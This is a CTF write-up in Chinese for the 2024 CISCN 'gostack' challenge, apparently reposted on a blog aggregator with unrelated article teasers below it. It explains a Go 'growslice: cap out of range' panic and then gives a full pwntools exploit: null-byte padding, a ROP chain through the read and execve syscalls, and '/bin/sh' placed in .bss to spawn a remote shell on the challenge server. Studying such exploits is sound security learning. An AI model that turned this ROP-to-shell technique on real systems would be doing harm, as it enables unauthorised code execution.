2024 cicsn gostack

文章目录

  • 思路
  • 报错
      • 报错原理
      • 具体场景分析
      • 示例说明
  • exp

思路

明显栈溢出,二分法试试,尝试得到偏移值,然后构造rop链,但偏移的填充物如果不是零字节会出现如下的报错

报错

,“cap out of range”(容量超出范围),发生在尝试扩展切片(slice)容量时。Go语言中的切片是一种动态数据结构,可以看作是对底层数组的封装,包含指向数组的指针、长度和容量三个要素。当向切片追加元素导致容量不足时,Go会自动尝试扩展切片容量。但是,如果扩展操作导致新的容量超出了其允许的最大值(通常是math.MaxInt32个元素),就会引发此错误。

报错原理

错误信息的关键部分是:

panic: runtime error: growslice: cap out of range

这意味着在运行时尝试扩大一个切片的容量时,所请求的新容量超出了支持的范围。通常,这是因为程序尝试存储的数据量超过了Go语言能够有效处理的切片最大容量限制。

具体场景分析

从错误堆栈跟踪中可以看到问题发生在fmt.Fprintf函数内部,具体是在处理字符串格式化和输出的过程中。错误起始于尝试写入一个非常长的字符串到缓冲区时,这个操作在内部触发了切片扩容,但由于字符串过长,导致扩容失败。

fmt.Fprintf({0x4df508, 0xc000010018}, {0x4c0995, 0x17}, {0xc000049ea8, 0x1, 0x1})

这里,程序试图格式化输出一个很长的字符串(你的输入),但在构建输出缓冲时遇到了容量限制问题。错误链中的fmt.(*buffer).writeStringfmt.(*fmt).padStringfmt.(*fmt).fmtS等函数调用,都与字符串处理和格式化输出有关。

示例说明

假设你有一个简单的Go程序,它的目的是读取用户输入并将其打印出来:

package mainimport ("fmt""os"
)func main() {var input stringfmt.Println("Input your magic message:")fmt.Scanln(&input)fmt.Printf("Your magic message: %s\n", input)
}

当你输入一个非常长的字符串,比如上百万个字符,程序在尝试通过fmt.Printf打印这个字符串时,就可能会遇到上述错误。因为在内部,fmt.Printf会尝试构建一个缓冲区来存放格式化后的字符串,如果字符串过长导致所需缓冲区的容量超过了Go所能支持的最大值,就会引发“cap out of range”的错误。

exp

from pwn import *
p=remote("8.147.129.254", 22350)#nc 8.147.129.254 22350
#p=process("./gostack")
#gdb.attach(p)
rdi=0x00000000004a18a5 #0x00000000004a18a5 : pop rdi ; pop r14 ; pop r13 ; pop r12 ; pop rbp ; pop rbx ; ret
rsi=0x000000000042138a#0x000000000042138a : pop rsi ; ret
rdx=0x00000000004944ec #0x00000000004944ec : pop rdx ; ret
rax=0x000000000040f984    #0x000000000040f984 : pop rax ; ret
syscall=0x0000000000461F65
bss=0x00000000005633A0
payload=b"\x00"*0x1d0+p64(rdi)+p64(0)+p64(0)+p64(0)+p64(0)+p64(0)+p64(0)+p64(rsi)+p64(bss)+p64(rdx)+p64(0x8)+p64(rax)+p64(0)+p64(syscall)
payload+=p64(rdi)+p64(bss)+p64(0)+p64(0)+p64(0)+p64(0)+p64(0)+p64(rsi)+p64(0)+p64(rdx)+p64(0)+p64(rax)+p64(0x3b)+p64(syscall)
#p.sendlineafter(b"Your magic message",payload)
p.sendlineafter(b"magic message :",payload)
p.send(b"/bin/sh\x00")
p.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/19467.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

labelme标注格式的数据集转COCO格式脚本

1. MyEncoder 类 - 这是一个自定义的 JSON 编码器类,用于处理 NumPy 数据类型。 - 当将 NumPy 数组或其他 NumPy 数据类型转换为 JSON 格式时,默认的 JSON 编码器无法正确处理。这个自定义的编码器可以解决这个问题。 2. labelme2coco 类 - 这是执行从 Labelme JSON …

主备切换大揭秘:保证系统永不停机的秘密

Hello,大家好!我是小米,一个积极活泼、热爱分享技术的小伙伴。今天我们来聊聊一个很重要的主题:分布式分区容错性中的主备切换。无论你是一个经验丰富的开发者,还是刚刚入门的小白,这篇文章都将为你揭开分布式系统的神秘面纱,带你深入了解其中的关键技术。让我们开始吧!…

scripts/Makefile.host 分析

文章目录 1. 目标 $(obj)/fixdep1.1 cmd_host-csingle函数分析: 1 # SPDX-License-Identifier: GPL-2.0 2 # 3 # Building binaries on the host system 4 # Binaries are used during the compilation of the kernel, for example 5 # to preprocess a …

【赠书第26期】AI绘画教程:Midjourney使用方法与技巧从入门到精通

文章目录 前言 1 Midjourney入门指南 1.1 注册与登录 1.2 界面熟悉 1.3 基础操作 2 Midjourney进阶技巧 2.1 描述词优化 2.2 参数调整 2.3 迭代生成 3 Midjourney高级应用 3.1 创意启发 3.2 团队协作 3.3 商业应用 4 总结与展望 5 推荐图书 6 粉丝福利 前言 在…

JS易错点

JavaScript 中的常见易错点包括语法错误、逻辑错误和一些常见的陷阱。以下是一些常见的错误和避免这些错误的建议: 变量声明错误 使用 var 声明变量可能导致变量提升和作用域问题,建议使用 let 和 const。错误示例:var x 10; if (true) {var…

Hibernate的优缺点

Hibernate的优缺点可以归纳如下: 优点: 对象关系映射(ORM): Hibernate提供了强大的对象关系映射功能,允许开发人员以面向对象的方式操作数据库,从而简化了数据库操作,提高了开发效…

污水净化之旅:可视化技术揭秘城市“血液”的循环奥秘

在繁华的都市背后,有一个默默守护着我们的“肾脏”——污水处理厂。它悄无声息地处理着每天产生的污水,确保我们的生活环境洁净美好。但你知道这个“肾脏”是如何工作的吗?今天,就让我们一起走进污水处理的神秘世界,通…

Leetcode:寻找两个正序数组的中位数

题目链接:4. 寻找两个正序数组的中位数 - 力扣(LeetCode) 题目分析 1、当只有一个有序数组时,该数组的中位数会将该数组分为两份:左子数组 和 右子数组 2、当有两个有序数组时, 我们仍然可以通过一条分隔…

上岸极不保护一志愿院校经验。

这个系列会邀请上岸学长学姐进行经验分享~ 今天分享经验的同学上岸了哈尔滨工程大学。并不是对这所院校有什么歧视,只是按照往年择校数据来看,确实不太保护一志愿。大家自行斟酌,有利有弊。 经验分享 学长23年上岸哈尔滨工程大学水声工程学…

Sealos CLI快速部署部署K8s集群

1. Kubernetes基础环境部署 kubernetes有多种部署方式,目前主流的方式有kubeadm、minikube、二进制包 minikube:一个用于快速搭建单节点kubernetes的工具 kubeadm:一个用于快速搭建kubernetes集群的工具 二进制包 :从官网下载每…

社区供稿丨GPT-4o 对实时互动与 RTC 的影响

以下文章来源于共识粉碎机 ,作者AI芋圆子 前面的话: GPT-4o 发布当周,我们的社区伙伴「共识粉碎机」就主办了一场主题为「GPT-4o 对实时互动与 RTC 的影响」讨论会。涉及的话题包括: GPT-4o 如何降低延迟(VAD 模块可…

k8s集群搭建

k8s集群搭建 前期准备 1.关闭selinux 永久关闭selinux sed -i s/enforcing/disabled/g /etc/selinux/config更改后需重启系统 reboot2.关闭防火墙 systemctl stop firewalld && systemctl disable firewalld3.关闭swap内存分区 永久关闭swap分区 echo vm.swapp…

LabVIEW中进行步进电机的位置控制

在LabVIEW中进行步进电机的位置控制,通常涉及以下几个关键步骤:设置硬件、配置通信、编写控制算法和实施反馈控制。以下是一个详细的介绍。 硬件设置 步进电机:选择合适的步进电机,根据负载和应用需求选择适当的步数和转矩。 驱…

FL Studio21.2.8中文版让你的音乐创作如鱼得水

在音乐的世界里,我们都是探索者,追求着无尽的创新和可能性。而在这个过程中,我们往往会遇到各种挑战和困扰。如何快速高效地创作出满意的音乐作品?如何将我们的创意完美地呈现出来?这些问题可能一直困扰着你。今天&…

成都欣丰洪泰文化传媒有限公司助力品牌快速崛起

在当今数字化浪潮汹涌的时代,电商行业作为新经济的代表,正以其独特的魅力和无限的潜力,引领着商业模式的创新与变革。在这个充满机遇与挑战的领域里,成都欣丰洪泰文化传媒有限公司凭借其专业的电商服务能力和前瞻性的战略眼光&…

如何在.htaccess文件创建一个自定义404页面

本周有一个客户,购买Hostease的虚拟主机,询问我们的在线客服,如何在.htaccess文件创建一个自定义404页面?我们为用户提供相关教程,用户很快解决了遇到的问题。在此,我们分享这个操作教程,希望可…

NIFT和BMP批量互相转换(matlab)

前言:最近在做数据集,需要进行NIFT和BMP的批量互相转换。之前都是一张一张转换的,用Image J就能完成,但是最近数据太多了,所以得研究一下如何批量转换。 NIFT和BMP互相转换 NIFT和BMP介绍NIFTBMP 为什么要转换Matlab进…

MVC和MVVM

MVC Model层:用于处理应用程序数据逻辑的部分,通常负责在数据库中存取数据 View(视图)处理数据显示的部分。通常视图是依据模型数据创建的 Controller(控制器)是处理用户交互的部分。通常控制器负责从视…

从零开始学Vue3--环境搭建

1.搭建环境 下载nodejs nodejs下载地址 更新npm npm install -g npm 设置npm源,加快下载速度 npm config set registry https://registry.npmmirror.com 使用脚手架创建项目 npm create vuelatest 根据你的需要选择对应选项 进入新建的项目下载依赖 npm in…

Tasker+SendSilentMail实现钉钉自动打卡

Tasker 允许用户根据自定义的“配置文件”(Profiles),在特定的“背景”(Contexts)下,执行指定的“任务”(Tasks)。以下是关于Tasker的详细介绍: 强大的自定义能力:用户可以根据自己的需求,创建各种配置文件和任务&…